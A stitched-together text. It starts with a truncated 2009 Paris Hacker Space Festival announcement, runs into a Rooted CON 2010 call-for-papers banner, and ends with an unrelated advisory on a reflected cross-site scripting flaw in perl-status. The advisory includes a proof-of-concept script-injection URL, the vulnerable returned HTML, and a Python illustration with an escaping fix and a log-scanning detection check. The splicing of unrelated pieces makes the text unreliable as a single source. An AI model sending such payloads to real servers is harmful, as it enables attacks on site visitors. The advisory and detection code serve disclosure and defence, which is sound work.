========================================================================
/tmp/lab announces the second Hacker Space Festival
(Paris, 26-30 June 2009)
========================================================================
Hacker Space Festival 2009 | Call For Proposals | HSF2009
In 2008, we organized HSF[1] on the spot, as an ad-hoc meeting for
hackerspaces-related networks, technical and artistic research emerging
from them and social questioning arising from them. This sudden
===============================
- Rooted CON 2010 -
C A L L   F O R   P A P E R S
===============================
.: [ ABOUT ]
Procheckup has found that, by making a malformed request to perl-status, a vanilla cross-site scripting (XSS) attack is additionally possible.
Proof of concept:
Submit the following URL to an unpatched server (here named "server"):
http://server:80/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
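The following is returned. The decoded path is reflected unescaped inside the href attribute, so the "> closes the attribute and the tag, and the script element is parsed as markup: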
<p><a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?env">Environment</a><br />
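The reflection shown in the returned line above, modelled as an added example. It is written in Python for illustration and is neither the perl-status handler's code nor part of the advisory. The function names are hypothetical, and the link template is an assumption taken from the single returned line on this page.

```python
import html
from urllib.parse import unquote

PREFIX = "/perl-status/"


def menu_link_unescaped(raw_path: str) -> str:
    """Model of the returned line: the decoded path is copied into href as-is."""
    path = unquote(raw_path)
    return f'<p><a href="{path}?env">Environment</a><br />'


def menu_link_escaped(raw_path: str) -> str:
    """Same link, with the decoded path HTML-escaped for an attribute context."""
    path = html.escape(unquote(raw_path), quote=True)
    return f'<p><a href="{path}?env">Environment</a><br />'


def breaks_out_of_attribute(raw_path: str) -> bool:
    """Flag perl-status request paths whose decoded form contains a character
    that can end a double-quoted attribute or open/close a tag.
    Only one level of percent-encoding is decoded here."""
    path = unquote(raw_path)
    return path.startswith(PREFIX) and any(c in path for c in '"<>')


# Request path taken from the proof of concept on this page.
POC_PATH = "/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
# Constructed benign request, for comparison.
BENIGN_PATH = "/perl-status/APR::SockAddr::port"

if __name__ == "__main__":
    for p in (POC_PATH, BENIGN_PATH):
        print("flagged:", breaks_out_of_attribute(p))
        print("escaped:", menu_link_escaped(p))
```

The check in breaks_out_of_attribute can be run over the request-path field of web server access logs to find requests of this shape against perl-status.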